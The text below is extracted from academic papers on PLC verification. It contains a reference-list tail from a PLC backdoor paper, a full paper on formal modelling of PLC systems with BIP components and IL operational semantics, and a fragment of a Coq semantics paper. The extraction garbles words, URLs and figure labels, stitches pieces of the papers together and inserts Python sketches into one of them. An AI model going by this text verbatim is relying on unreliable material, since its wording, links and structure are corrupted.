hUp:llwww.langner.comlen!20lll071 211a- ti me-bomb- with- fourteen- bytesl [12] B. Meixell and E. Forner, "Out of Control: Demonstrating SCADA Exploitation:' Black Hat USA, 2013. [13] S. E. McLaughlin, "On dynamic malware payloads aimed at pro grammable logic controllers." in HotSec, 20 II. 532 [14] S. McLaughlin and P. McDaniel, "Sabot: specification-based payload generation for programmable logic controllers," in Proceedings of the 2012 ACM coriference on Computer and communications security. ACM, 2012, pp. 439-449. [15] Wikipedia, "Automation Pyramid (content taken)." [Online]. Available: https:llde.wikipedia.org/wiki/Automatisierungspyramide [16] Siemens, "S7 314C- 2PN/DP Technical Details." [Online]. Available: https://support.industry.siemens.com /cs/pd/495261 ?pdti=td& pnid= 13754&lc=de- WW [17] -- , "S7-300 CPU 31xC and CPU 31x: Technical specifications." [Online]. Available: https:llcache.industry.siemens.com/dllfil es/906/12996906lau_70325/v II s7300_cpu_3 1xc_and_cpu_3 1 x_manuaCen- US_en-US.pdf [18] -- . (2011) S7-300 Instruction list S7-300 CPUs and ET 200 CPUs . [Online]. Available: https://cache.industry.siemens.com/dIlfiles/679/ 3 I 977679/atC8I 622/v lIs7300_parameter_manual_en- US_en- US.pdf [19] SNA P7, "S7 Protocol." [Online]. Available: http://snap7.sourceforge. netlsiemens_comm.html#s7 _protocol [20] J. Kiihner, "DotNe tSiemensPLCT oolBoxLibrary." [Online]. Available: https:llgithub.comljogibear9988/ DotN etSiemensPLCToolBoxLibrary [21] Siemens. (2006) System Software for S7-300/400 System and Standard Functions Volume 112. [Online]. Available: https:llcache.industry. 
siemens.com/dIlfiles/57 4/121457 4/atc 44504/v lISFC_e.pdf [22] D. Marzin, S. Lau, and J. Klick, "PLCinject Tool." [Online]. Available: https:llgit hub.comlSCADACS/P LCinject [23] J. Case, M. Fedor, M. Schoffstall, and J. Davin, "Simple Network Management Protocol (SN MP)," RFC 1157 (Historic), Internet Engineering Task Force, May 1990. [Online]. Available: http://www.ietf.orglrfc/rfcI157.txt [24] M. Leech, M. Ganis, Y. Lee, R. Kuris, D. Koblas, and L. Jones, "SOCKS Protocol Version 5," RFC 1928 (Proposed Standard), Internet Engineering Task Force, Mar. 1996. [Online]. Available: http://www.ietf.orglrfc/rfc 1928.txt Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:33 UTC from IEEE Xplore. Restrictions apply.
1 st Workshop on Security and Privacy in Cybermatics (SPiCy 2015) Internet-facing PLCs as a Network Backdoor Johannes Klick, Stephan Lau, Daniel Marzin, Jan-Ole Malchow, Volker Roth Freie Universitat Berlin -Secure Identity Research Group <first name>.<lastname> @fu-berlin.de
Formal_Modelling_of_PLC_Systems_by_BIP_Components.pdf
Programmable logic controllers (PLCs) are complex embedded systems which are widely used in industry. The formal modelling of a PLC system for verification is a demanding task. A good verification model should be faithful to the system, and should also have a suitable scale because of the state explosion problem of verification. This paper proposes an automatic framework for the construction of verification models of PLC systems. BIP (Behavior, Interaction, Priority) separates behavioral and architectural aspects in modelling. Specific PLC features and the system architecture are modelled with the BIP framework; they are universal for all PLC applications. We define the operational semantics of PLC instructions and present an automatic, translation-based modelling method for PLC software. A small example demonstrates our approach.

I. INTRODUCTION

As embedded control systems become more and more complex, the safety of systems plays a critical role for high dependability. A tiny error may cause financial losses or even cost human lives. Formal methods are an effective way to analyze and assure the reliability of complex systems. The programmable logic controller (PLC), a typical control system, is popular in industry. A PLC controls several processes concurrently. It receives input signals from sensors, processes them and produces control signals. Model checking has proved to be a powerful automatic verification technique [1]. It has been successfully applied to hardware design and communication protocol verification. In recent years, this technique has been used to verify certain types of software and achieved some success. The model checking process has three main steps. First the system is modeled as a Kripke structure. Then certain properties are expressed by temporal logic formulas. The model checking algorithm checks if the model satisfies the required properties. If a property is not satisfied, a counterexample is provided. The critical precondition of verification is modelling.

The International Electrotechnical Commission (IEC) published the IEC 61131 standard [2] for programmable controllers. The five PLC programming languages defined by the IEC are Instruction List (IL), Ladder Diagram (LD), Structured Text (ST), Function Block Diagram (FBD) and Sequential Function Chart (SFC). Most research on PLCs focuses on IL programs. In [3], G. Canet et al. translate simple IL programs into the SMV input language manually. The model covers one cycle of the PLC execution and does not consider counters or integer types. R. Huuck uses abstract interpretation based static analysis to find runtime errors in [4]. However, the model is static, so only general properties can be checked. K. Loeis et al. [5] model the control system's cyclic behavior first and then the IL programs; they are integrated as one model and SMV is the verification tool. In order to find an automatic translation to a formal specification, Mealy automata [6] and XML [7] are used as intermediate formats between programs and verification tool input, but the program must first be rewritten in IF-THEN-ELSE form. Petri nets and timed automata have both been used to model PLC programs. A PLC program translation tool is given in [8]. It translates IL programs to timed automata which can be checked by Uppaal [9]. The data types are restricted to Booleans and function block calls are not included. M. Heiner and T. Menzel define a Petri net semantics of IL in [10], but the verification phase is not included.
In [11], [12], Signal Interpreted Petri Net (SIPN) which extended Petri net with input and output signals are adopted to model PLC system. Such extension is powerful for modeling, but Petri net tool is not strong enough to analyze SIPN, they still have to use SMV . The methods presented above only consider software itself. The PLC environment and features of hardware platform are not mentioned . This paper presents a method of modeling PLC system for veri cation. The common parts of PLC hardware plat- form are modelled as BIP [13] components. Function call, interrupt heading and PLC cyclic mode are formalized by BIP synchronization with connectors. These parts are same for different PLC applications. We de ne the operational semantics of PLC instructions. The PLC software is formalized as a transition system according to operational semantics. An example is demonstrated for this modelling procedure. The paper is organized as follows. Section 12 introduces the BIP concepts and related tools. The modeling of PLC architecture and PLC features are shown in section III. Section IV de nes the operational semantics of PLC language and the translation based modeling method of software. In section V, we conclude the paper. 2013 IEEE 37th Annual Computer Software and Applications Conference 0730-3157/13 $26.00 2013 IEEE DOI 10.1109/COMPSAC.2013.85512 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:07 UTC from IEEE Xplore. Restrictions apply. II. T HEBIP F RAMEWORK The BIP component framework is a formalism supporting rigorous design for heterogeneous component-based system- s [14]. It allows the description of systems as the composition of atomic components characterized by their behavior and their interfaces. It supports a system construction methodology based on the use of two families of composition operators: in- teractions and priorities. Components are composed by layered application of two operators. A. BIP Concepts In BIP , atomic components are nite-state automata extend- ed with variables and ports. V ariables are used to store local data. Ports are action names, and may be associated with variables. They are used for interaction with other components. States denote control locations at which the components await for interaction. A transition is labeled by a port, from a control location to another. It has associated a guard and an action, that are respectively, a Boolean condition and a computation de ned on local variables. In BIP , data and their transformations are written in C. Interactions describe synchronization constrains between ports of the composed components. Interactions are used to specify multiparty synchronization between components as the combination of two protocols: rendezvous which denotes strong symmetric synchronization and broadcast which ex- presses weak asymmetric synchronization. Interactions are de- ned using connectors. Connectors are sets of ports augmented with additional information . Every interaction has a guard and an action. The action can be an update function, operating on data associated to ports participating in the interaction. Priorities between interactions are used to restrict nonde- terminism inherent to parallel systems. They are particularly useful to model scheduling policies. When the transition condition holds and two interactions are enabled, then only the high priority interaction is allowed for execution. In practise, priorities steer system evolution. B. 
BIP T ools The BIP framework is concretely implemented by the BIP language and an extensible toolbox [15]. The toolbox provides front-end tools for editing and parsing of BIP programs, as well as for generating an intermediate model, followed by code generation (in C++). Intermediate models can be subject to various model transformations focusing on construction of optimized models for respectively sequential [16] and distributed execution [17]. It provides also back-end tools in- cluding runtime for analysis (through simulation) and ef cient execution on particular platforms. The toolbox provides a ded- icated modelling language for describing BIP component and connector. The BIP language leverages on C-style variables and date type declarations, expressions and statements. It also provides additional structural syntactic constructs for de n- ing component behavior, specifying the coordination through connectors. Moreover it proposes mechanism for parametric descriptions. So it can de ne type and instance.Program execuation Input phase Output phase Fig. 1. PLC Operation Mode V alidation of BIP models can be achieved by using static or runtime validation techniques. The static validation tech- niques are supported by the D-Finder tool [18]. The runtime validation technique of BIP is based on construction and execution of monitored systems. Monitors are atomic compo- nents presenting safety requirements. If safety properties are violated, monitors move to error state. BIP framework provide native support for building and running executable models for monitored systems. III. F ORMALIZA TION OF PLC F EATURES This section proposes the modelling framework for com- plicated software hardware mixed system. The execution of software is highly related with the hardware and the envi- ronment. So we should model the speci cal features of PLC systems. These models are common parts of the different PLC applications. A. F ormalization of Cyclical Operation Mode PLC runs in a cyclical way of three stages which is shown in g.1. At the input phase, it scans signals from the sensors and stores them in the input registers. Then the instructions in memory are read out and executed. The results are stored in the output registers at the second stage. All data in the output registers will be sent to actuators in output phase. In view of that operation mode, two kinds of models can be extracted. One model at a higher level of extraction ignores the operation details, which is easy to analyze and verify. The other one considers the cyclical operation mode through a scheduling component, which displays the read-in, operation and read-out of data. The cyclic scheduler component is shown in Fig.2. It comprises two states. At the beginning, it transmits from the initial state IDLE to the EXE state, synchronizing with the environment and PLC main program through startCyc . The EXE state indicates the execution of PLC. After a delay of CycleTime which signi es the cycle time, the component moves back to the IDLE state through a synchronization port finCyc . That is all for a PLC cycle. Such an explicit model shows the details of the implementation in a cycle. And due to the lower abstraction, we obtain models of a larger scale. B. F ormalization of Interrupt scheduler Interrupt is a vital feature of PLC. If an interrupt happens, the running program switches to handle it and returns to the original program when nished. 
PLC admits kinds of inter- rupts, such as external I/O interrupt, communication interrupt, and time base interrupt. They have different priorities, and 513 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:07 UTC from IEEE Xplore. Restrictions apply. IDLEstartCyc finCycstartCyc ticktime=0 ticktime>CycleTime, finCycticktime<=CycleTime tick ticktime++ tickEXE Fig. 2. BIP model of cyclical scheduler PREint ret pre start finEXEfinPriStack=empty retid PriStackint PriStack.push(id) startINITpre id=PriStack.pop() int PriStack.push(id)Rea Fig. 3. BIP model of interrupt scheduler the communication interrupt has the top priority. According to the principle of rst-come rst-service, a running interrupt is not allowed to interrupt for most PLCs. Until the running one nished, another interrupt of highest priority is chosen to execute from interrupt queue. Since the cycle time of PLC is short as tens of milliseconds, in general, interrupts are judged periodically and then get executed. Fig.3 presents the model of interrupt scheduler model. It answers the request signals from hardware and environment. An interrupt interrupt idelivers its name to the component that dispatches it. The scheduler component collects all the interrupts in a priority queue and chooses the high priority one to preempt main program by pre port. When the component moves to the Rea state, it broadcasts scheduling of the interrupt handler, which will be executed by corresponding components in the software model. In that process, the in- terrupt scheduler can accept new arrivals of interrupts and add them into the queue. When nishing that process, the component transmits to the PRE state through a port fin. If the queue is empty at that time, it moves back to the initial state and synchronizes with main program by retport. Otherwise, it will continue to handle interrupts. C. F ormalization of Function Call As IEC 61131-3 de nes, Program Organization Units (POU) is composed of program, function block (FB), and function, which are the minimum and independent software units in user programs. The PLC softwares organized by POU have good performance on modularity. FB may call functions or other function blocks in a nested way, but not recursive. Different from FB, however, function cannot do this owing tostartCyc finCycIDLEstartCyc finCycCalPara RetPara FBid S1 SnSUS pre retSiSi+1 Sj Sj+1call callcall return return returnpreret Fig. 4. BIP model of main program call returnIDLEcall returnCalPara RetPara FBidS1 SnSisubcal subretSi+1 Si+2subretsubcall Fig. 5. BIP model of Function Block no static variables and storage space. The general pattern of function call is presented in this paragraph. The main program calls functions shown in Fig.4 through a broadcast port call with parameters FBid which is the name of FB component to communicate with and the function arguments which will be valued. As shown in Fig.5, the called component runs after receiving call signal. When it comes to the RET instruction at the end, a stop signal will be send out through ret port to the program that makes the call. D. PLC System Architecture The execution of PLC software is highly related with the hardware platform and the environment. So we should model hardware platform and the environment. PLC system model includes three parts, the software model, hardware platform model and environment model. For the existing PLC software, the model can be obtained by automatic translation. 
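The first-come, first-served interrupt handling described in Section III-B can be sketched in the same informal way. In the Python sketch below, which is illustrative only, a heap-based priority queue stands in for the BIP priority mechanism and plain functions stand in for the interrupt-handler components; lower numbers denote higher priority, so the communication interrupt would be queued with priority 0.

import heapq

class InterruptScheduler:
    def __init__(self, handlers):
        self.handlers = handlers      # maps interrupt id -> handler function
        self.queue = []               # priority queue of (priority, id)
        self.running = None

    def raise_interrupt(self, priority, int_id):
        # "int" port in the BIP model: push the interrupt id into the queue
        heapq.heappush(self.queue, (priority, int_id))

    def schedule(self):
        # "pre"/"start": preempt the main program and run queued handlers
        # until the queue is empty; a running handler is never preempted
        while self.queue:
            _, int_id = heapq.heappop(self.queue)
            self.running = int_id
            self.handlers[int_id]()   # handler runs to completion ("fin")
            self.running = None
        # queue empty: "ret" port, control returns to the main program

handlers = {"comm": lambda: print("communication handler"),
            "io":   lambda: print("I/O handler")}
sched = InterruptScheduler(handlers)
sched.raise_interrupt(1, "io")
sched.raise_interrupt(0, "comm")   # communication interrupt has top priority
sched.schedule()                   # runs "comm" first, then "io"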
Then the system model can do simulation or veri cation with the help of BIP tools. This framework is extendible. We can easily add more components. BIP separates behavioral and architectural aspects in mod- elling. Architecture is meaningfully de ned as the combination of interactions and priority. PLC system architecture shown in Fig.6 is composed of three layers. Software includes all application program organizations. The software are modelled as separate components. Main program can call functions or function blocks. Function block can call nested function block or nested function. CAL instruction is modelled as a CallCon connectors. The call port of calling program 514 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:07 UTC from IEEE Xplore. Restrictions apply. component sends signals by broadcast mechanism. It compares the names of all connected component with the name of called functions and decides which one is called. PLC can handle interrupts. The interrupt handler is modelled as a component. Timer is separate function, and is modeled as a component. When timer start, this component is aroused by call port. This layer describes the software structure explicitly. The middle layer is the abstraction model of the hardware platform. This layer simulates the features of PLC, that is cyclic execution mode and interruption handling. The bottom layer is environment. In order to make the system closed and available for veri cation, this layer in- cludes the model of controlled devices. Sensors collect data of environments. This information is written to PLC at the beginning of every execution cycle through startCyc port. After the computation of PLC programs, commands are given to actuators through finishiCyc port. Interrupt events of environment such as communication interrupt, alarm interrupt and clock interrupt are modelled as components. IV . T RANSLA TION BASED SOFTW ARE MODELING For the existing system, the model of main program and functional block in Fig.6 can be achieved by automatic trans- lation. The main program and functional block are translated to atomic components. We de ne the connectors for func- tion calls. Software models are composed by these atomic components and connectors. The system model obtained by this method has kept the topology structure of software. This section introduces the IL instructions of PLC, de nes the operational semantics of these instructions, and proposes the translation method and rules. A. IL Instructions In order to make this method more common, we choose IL language de ned in IEC 61131-3 as the source code. IEC 61131-3 de nes the modi er, function, function block. Compared with other PLC languages, IL is more concise and assembly like text language. IL language supports bool, integer, and oat. The cr(current result) register stores current computing result. Some instructions have crrelated condition- s. Our method models PLC POU as atomic component. The calling of interrupt handler is similar with function call. Bit Logic Instructions : AND, OR, XOR, NOT Set and Reset Instructions: S, R Data Load and Transfer Instructions: LD, ST Logic Control Instructions : JMP , CAL, RET Integer Math Instructions : ADD, SUB, MUL, DIV , MOD Comparison Instructions : GT, GE, EQ, NE, LE, LT IL instructions can have one or none operand. The operands of instructions can be variable, constant, label or address. Table I shows the meaning of common IL instructions. 
There are three kinds of variables, Iis the input variable, Qis the output variable, Mis the local variablesTABLE I THE MEANING OF ILINSTRUCTIONS Instruction Modi er Type Description AND N,( variable, constant logical and OR N,( variable, constant logical or XOR N,( variable, constant logical nor NOT NONE logical not S variable set R variable reset LD N variable, constant assign operand to cr ST N variable assign cr to operand JMP C,N Label jump to label instruction CAL C,N function name function call RET C,N NONE function return ADD ( variable, constant add operation SUB ( variable, constant subtraction operation MUL ( variable, constant multiply operation DIV ( variable, constant division operation MOD ( variable, constant mode operation GT ( variable, constant compare result is BOOL B. The Operational Semantics of IL Instructions The PLC programming organization unit Phas three type- s, program Prog , function Fun , and function block FB. Program con guration is the program execution environment including all data of the program. De nition 1 The con guration of programming organiza- tion unit PisCP=<ID,PC ,V,P IN,POUT >, ID is the name of current execution program, PC is the program counter, Vis the set of variables, including cr,cr V, PINis the variables of input port of program P.I fP has the type of Prog , this port is synchronous with the cyclic component with startCyc port. IfPisFB type, this port is synchronous with call port POUT is the variables of the output port of P.I fPhas the type of Prog this port is synchronous with the cyclic component with port finishCyc .I fPisFB type, this port is synchronous with retport IL program Pis a sequence of instructions l1,l2,...,l m, where m Nis the number of P. For any instruction li, the operational semantics S/llbracketli/rrbracketis a transition system. The program con guration is the state and the execution of an IL instruction causes a state transition from one con guration to another con guration. We de ne the BIP component model of program as follows: De nition 2 Transition system is is a triple = < CP,T,C0 P>, where CPis PLC program con guration, T CP CPis the set of transition relations, C0 P CPis the initial state. For the common denotation of all instructions, we add an IO instruction at the beginning with PC assigning 0. This instruction is used for synchronization with startCyc port and call port. It does not have data operation. The initial con guration is <I D ,0,Vinit,Pinit IN,Pinit OUT >. 1. The operational semantics of input instruction P(0) = IOis de ned as follows. If PisProg type, the data of port is transmitted. If the type is FB, the real parameter is passed 515 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:07 UTC from IEEE Xplore. Restrictions apply. Main programFunction BlockFunction Interrupt Scheduler Cyclic SchedulerInterrupt handler sensoractua torInterrupt 1Interrupt nEnvarionmentHardware PlatformSoftware Fig. 6. PLC System Architecture by ports. /mapsto denotes the change of variables. Imeans the data vector of port. startCyc( P)means combining data vector with input port of program P, if the type of PisProg . S/llbracketio/rrbracket= PC/prime=1,P/prime IN=PIN[ I/mapsto startCyc( P)] <I D ,0,V,P IN,POUT > <I D ,P C/prime,V,P/prime IN,POUT > IfP s type is FB S/llbracketio/rrbracket= PC/prime=1,P/prime IN=PIN[ I/mapsto call(P)] <I D ,0,V,P IN,POUT > <I D ,P C/prime,V,P/prime IN,POUT > 2. 
IfP(PC)=AND op, the operational semantics is S/llbracketAND /rrbracket= PC/prime=PC+1,V/prime=V[cr/mapsto cr op] <ID,PC ,V,P IN,POUT > <I D ,P C/prime,V/prime,PIN,POUT > This instruction only change the value of program counter and cr. Other logical instruction such as OR, XOR and NOT have the similar operational semantics. The type of opisBOOL. 3. IfP(PC)=So p , the operational semantics is S/llbracketS/rrbracket= PC/prime=PC+1,V/prime=V[if(cr=1 ) op/mapsto 1,e l s e o p /mapsto 0] <ID,PC ,V,P IN,POUT > <I D ,P C/prime,V/prime,PIN,POUT > The value of cris the execution condition. If cris1, the operand is set to 1, otherwise operand is set to 0.4. IfP(PC)=LD op , assign the value of opto register cr. S/llbracketLD /rrbracket= PC/prime=PC+1,V/prime=V[cr/mapsto op] <ID,PC ,V,P IN,POUT > <I D ,P C/prime,V/prime,PIN,POUT > 5. IfP(PC)=ADD op, this math instruction assigns the value of opwith cr, and saves to cr. The semantics of other math instructions are similar. S/llbracketADD /rrbracket= PC/prime=PC+1,V/prime=V[cr/mapsto cr+op] <ID,PC ,V,P IN,POUT > <I D ,P C/prime,V/prime,PIN,POUT > 6. IfP(PC)=GT op , compare instruction compares the operand with cr, theBOOL result is saved in register cr. S/llbracketGT /rrbracket= PC/prime=PC+1,V/prime=V[if(cr > op) cr/mapsto 1,e l s e c r /mapsto 0] <ID,PC ,V,P IN,POUT > <I D ,P C/prime,V/prime,PIN,POUT > 7. IfP(PC)=JMPC label andcris 1, then jump to instructions with the name of label , otherwise execute the next instruction. S/llbracketJMPC /rrbracket= if(cr=1 ) PC/prime=label, else PC/prime=PC+1 <ID,PC ,V,P IN,POUT > <I D ,P C/prime,V,P IN,POUT > 8. IfP(PC)=CAL op , here opis the name of called POU, operand is passed by the rst instruction IO. S/llbracketPC /rrbracket= ID/prime=op, PC/prime=0 <ID,PC ,V,P IN,POUT > <I D/prime,PC/prime,V,P IN,POUT > 9. IfP(PC)= RET , return instruction gives the result to calling program through connectors and ports. pre(PC)is 516 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:07 UTC from IEEE Xplore. Restrictions apply. ) ( exeistm iendi begin Fig. 7. Basic instruction translation rule ) ( exeistm ) ( exe1/g14istmbegin end end i begin1/g14iendiend Fig. 8. Sequence instruction translation rule the value of calling program. pre(ID)is the name of calling program. S/llbracketRET /rrbracket= PC/prime=pre(PC)+1 ,I D/prime=pre(ID),f <ID,PC ,V,P IN,POUT > <I D/prime,PC/prime,V,P IN,P/prime OUT >, where f=P/prime OUT=POUT[ O/mapsto finCyc(P)] C. Automatic Translation Rules The instruction semantics explains the execution effect for the con guration. We can extract the translation rule in line with instruction semantics. Assuming that program Pis composed of ninstructions P={IO,l 1, ..., l n}The initial state of the translation system is<I D ,0,Vinit,Pinit IN,Pinit OUT >. The transition for instruc- tionliisCi pexe(li) Ci+1 P. PLC program control instruction will change the structure of the transition system. We conclude these instructions into four kinds as shown below, stm stand for one instruction and code is a segment of instructions. 1) Basic instructions Code=stm i The state machine for this kind of instruction is showed in g.7 2) Sequence instructions Code=stm i stm i+1 Sequence instructions are two instructions executed one by one. Fig. 8 combines the nishing state of stm iwith the beginning state of stm i+1. 3) Branch instruction Code=JMP(C)label code 1 label code 2 Jump instruction is used for branching control. JMP instruction is for uncondition jump. 
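These instruction semantics can be exercised directly. The following Python sketch, which is only an illustration and not part of the BIP translation, interprets the sequential core (LD, ST, ADD, GT, JMPC, RET) over a configuration reduced to the program counter, the cr register and the variable store V; labels are replaced by instruction indices for simplicity.

def value(operand, V):
    # An operand is either a variable name or a literal constant.
    return V[operand] if isinstance(operand, str) else operand

def run(program, V):
    pc, cr = 0, 0
    while True:
        op, arg = program[pc]
        if op == "LD":     cr = value(arg, V);                  pc += 1
        elif op == "ST":   V[arg] = cr;                         pc += 1
        elif op == "ADD":  cr = cr + value(arg, V);             pc += 1
        elif op == "GT":   cr = 1 if cr > value(arg, V) else 0; pc += 1
        elif op == "JMPC": pc = arg if cr == 1 else pc + 1      # arg = index
        elif op == "RET":  return V
        else: raise ValueError("unsupported instruction: " + op)

# x := x + 1, then y := 1 if x > 10 else 0
prog = [("LD", "x"), ("ADD", 1), ("ST", "x"),
        ("GT", 10), ("ST", "y"), ("RET", None)]
print(run(prog, {"x": 10, "y": 0}))   # {'x': 11, 'y': 1}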
The program will directly jump to code 2. When the value of cris 1, JMPC instruction will jump, otherwise it execute the next instruction. Fig 9 models jump instructions. 4) Function call instruction Code=CAL FBname code 1begin begin begin) ( exe JMP 1/g32/g32cr1code begin begin 2 code begin 0/g32/g32cr 1code begin begin 2 code begin Fig. 9. Branch instruction translation rule callwait beginret wait begin code begin Fig. 10. Function call instruction translation rule In BIP model, CAL instruction is synchronous with called component through call port. When the called function nished execution, it returns to main program with values through retport. While translating according to the rules strictly, the state space is large. The transition for sequence instruction only change the value of local variable and do not communicate with other component through ports. For example, transitions Ci pr(li) Ci+1 pr(li+1) Ci+2 pr(li+2) Ci+3 p are all inter- nal transitions. BIP is a high level modelling language and expressiveness. Transitions in BIP component always have communication signals. So when program segments only have sequence instructions, we can compress these steps into one step, that is Ci pr(li);r(li+1);r(li+2) Ci+3 p. One transition has three assign operations. Here is an example demonstrating the translation based modelling method. Fig.11 is the IL program for computing the square root. Fig.12 is the corresponding formal models. This component has two ports, calling port call and returning portcall. Port call binds the input data xand port ret binds the square root of x. The segments without jump instruction and call instruction can be compressed in to one transition. This method reduces the scale of model. V. C ONCLUSION Computer aided veri cation is an important task in complex embedded system. The formal modelling of PLC system for veri cation is a rough task. Good veri cation model should be faithful and concise. At one hand the model must be consistent with the system, at the other hand the model must have suitable scale because of the state explosion problem of veri cation. This paper has proposed a systemic method for the construction of veri cation model. PLC system architecture and PLC features has been modeled as components and 517 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:07 UTC from IEEE Xplore. Restrictions apply. VAR_INPUT x: INT; END_VAR VAR_OUTPUT result:INT; END_VAR VAR v:INT; vsqr:INT; END_VAR LD 0 ST v start: LD v ADD 1 ST v MUL v ST vsrq LD x GT vsqr JMPC start LD x EQ vsqr JMPC equal LD v SUB 1 ST result JMP equal: LD v ST result end: RET Fig. 11. IL program call v:=0 vsqr:=v*(v+1) cr==1cr==0 result=v-1 result=v retcr:=(x==vsqr?)cr:=(x>vsqr?) cr==1cr==0 call(x) ret(result)Data int x Data int result Data int v Data int vsqr Fig. 12. program modelconnectors. This is universal for all PLC applications. We have given an automatic translation method for software modelling based on operational semantics. A small example has been demonstrated for our approach. ACKNOWLEDGEMENT This work is supported by the International S&T Coop- eration Program of China (2011DFG13000), Mechanism and V eri cation of High-speed Embedded Communication Sys- tems in Rugged Environment(2010DFB10930) and the Beijing Natural Science Foundation and S&R Key Program of BMEC (4122017, KZ201210028036). REFERENCES [1] E. M. Clarke, O. Grumberg, Model Checking, The MIT Press, 1999. 
[2] International Electrotechnical Commission, Technical Committee No. 65, Programmable Controllers - Programming Languages, IEC 61131-3, second edition (1998), committee draft.
[3] G. Canet and S. Couffin, "Towards the automatic verification of PLC programs written in Instruction List," 2000.
[4] R. Huuck, "Semantics and analysis of Instruction List programs," Electronic Notes in Theoretical Computer Science, vol. 115, pp. 3-18, 2005.
[5] K. Loeis, M. B. Younis, and G. Frey, "Application of symbolic and bounded model checking to the verification of logic control systems," in Proceedings of the 10th IEEE International Conference on Emerging Technologies and Factory Automation (ETFA 2005), Catania, Italy, vol. 1, pp. 247-250, Sept. 2005.
[6] M. B. Younis and G. Frey, "Formalization of PLC programs to sustain reliability," in Proceedings of the 2004 IEEE Conference on Robotics, Automation and Mechatronics (RAM 2004), Singapore, pp. -618, Dec. 2004.
[7] M. B. Younis and G. Frey, "Visualization of PLC programs using XML," in Proceedings of the American Control Conference (ACC 2004), Boston, USA, pp. 3082-3087, June 2004.
[8] H. X. Willems, "Compact timed automata for PLC programs," Technical Report, University of Nijmegen, 1999.
[9] http://www.uppaal.com, accessed January 2007.
[10] M. Heiner and T. Menzel, "A Petri net semantics for the PLC language Instruction List," IEE Control, 1998, pp. 161-166.
[11] T. Mertke and G. Frey, "Formal verification of PLC programs generated from Signal Interpreted Petri Nets," in Proc. Int. Conf. Systems, Man and Cybernetics, 2001, pp. 2700-2705.
[12] X. Weng and L. Litz, "Verification of logic control design using SIPN and model checking: methods and case study," in Proceedings of the American Control Conference, 2000, pp. 4072-4076.
[13] A. Basu, M. Bozga, and J. Sifakis, "Modeling heterogeneous real-time components in BIP," in SEFM'06, IEEE Computer Society, 2006.
[14] A. Basu, S. Bensalem, M. Bozga, J. Combaz, M. Jaber, T.-H. Nguyen, and J. Sifakis, "Rigorous component-based system design using the BIP framework," IEEE Software, vol. 28, no. 3, pp. 41-48, 2011.
[15] The BIP Toolset, http://www-verimag.imag.fr/Rigorous-Design-of-Component-Based.html.
[16] M. Bozga, M. Jaber, and J. Sifakis, "Source-to-source architecture transformation for performance optimization in BIP," IEEE Trans. Industrial Informatics, vol. 6, no. 4, pp. 708-718, 2010.
[17] B. Bonakdarpour, M. Bozga, M. Jaber, J. Quilbeuf, and J. Sifakis, "From high-level component-based models to distributed implementations," EMSOFT 2010, pp. 209-218.
[18] S. Bensalem, M. Bozga, T.-H. Nguyen, and J. Sifakis, "D-Finder: a tool for compositional deadlock detection and verification," CAV 2009, pp. 614-619.
Formal Modelling of PLC Systems by BIP Components
Rui Wang, Yong Guan, Liming Luo (College of Information Engineering, Capital Normal University, Beijing, China); Jie Zhang (College of Information Science and Technology, Beijing University of Chemical Technology, Beijing, China); Xiaoyu Song (ECE Dept., Portland State University, Portland, USA)
A_Formal_Semantics_of_PLC_Programs_in_Coq.pdf
Programmable Logic Controllers (PLC) are embedded systems that are widely used in industry. We propose a formal semantics of the Instruction List (IL) language, one of the five programming languages defined in the IEC 61131-3 standard for PLC programming. This semantics supports a significant subset of the IL language that includes on-delay timers. We formalized this semantics in the proof assistant Coq and used it to prove some safety properties on an example of a PLC program.

Abstract interpretation techniques are also used for the verification of PLC programs. In [5] an operational semantics of IL is defined. This semantics is used to perform abstract interpretation of IL programs by a prototype tool called HOMER. In the theorem proving community, there has been some work on the formal analysis of PLC programs. In [4] the theorem prover HOL is used to verify PLC programs written in the FBD, SFC and ST languages. In this work, modular verification is used for compositional correctness and safety proofs of programs. In the Coq system, an example of verification of a PLC program with timers is presented in [11]. A quiz machine program is used as an example in this work, but no generic model of PLC programs is formalized. There is also a formalization of a semantics of the LD language in Coq (research report in Korean, available at http://pllab.kut.ac.kr/tr/2009/ldsemantics.pdf). This semantics supports a subset of LD that contains branching instructions. This work is a component of a CDK environment for PLC.

VI. Conclusions and future work

Our goal is to develop a formally verified compiler and a verification tool for PLC programs. This requires a formal semantics of PLC programming languages. In this paper we presented a formal semantics of PLC programs written in the IL language. This semantics covers a large subset of IL instructions that includes timers. We formalized this semantics in the type-theory-based theorem prover Coq and used it to prove some safety properties of a simple example of a PLC program. The proofs of these properties are straightforward and require only some basic knowledge of the Coq system. Although our main goal is the development of a certified PLC compiler, this work can also be used for formally proving properties of IL programs.

In the short term, the perspectives of our work are the following. Developing a certified compiler front-end for PLC: we plan to formalize and certify a transformation of PLC programs written in the LD language to IL. Integrating our formal semantics of IL with the formal semantics of the meta language SFC [12]: this will allow us to prove safety properties of industrial examples of PLC programs written in SFC. In the long term, the work on the certified compiler front-end opens the way to the development of a certified compilation chain for PLC. This chain can be built on top of the CompCert compiler and use the BIP [13] framework as an intermediate language. We also plan to develop a static analysis tool for PLC programs.

References
[1] I. E. Commission, "IEC 61131-3: Programmable controllers - programming languages," IEC, Tech. Rep., 2003.
[2] A. Mader and H. Wupper, "Timed automaton models for simple programmable logic controllers," Real-Time Systems, Euromicro Conference on, pp. 01-06, 1999.
[3] G. Canet, S. Couffin, J.-J. Lesage, A. Petit, and P. Schnoebelen, "Towards the automatic verification of PLC programs written in Instruction List," in 2000 IEEE International Conference on Systems, Man, and Cybernetics, vol. 4, 2000, pp. 2449-2454.
[4] N. Volker and B. J. Krämer, "Automated verification of function block-based industrial control systems," Science of Computer Programming, vol. 42, no. 1, pp. 101-113, 2002.
[5] R. Huuck, "Semantics and analysis of instruction list programs," Electr. Notes Theor. Comput. Sci., vol. 115, pp. 3-18, 2005.
[6] The Coq Development Team, The Coq System, http://coq.inria.fr.
[7] G. Gonthier and A. Mahboubi, "A small scale reflection extension for the Coq system," INRIA Technical report, http://hal.inria.fr/inria-00258384.
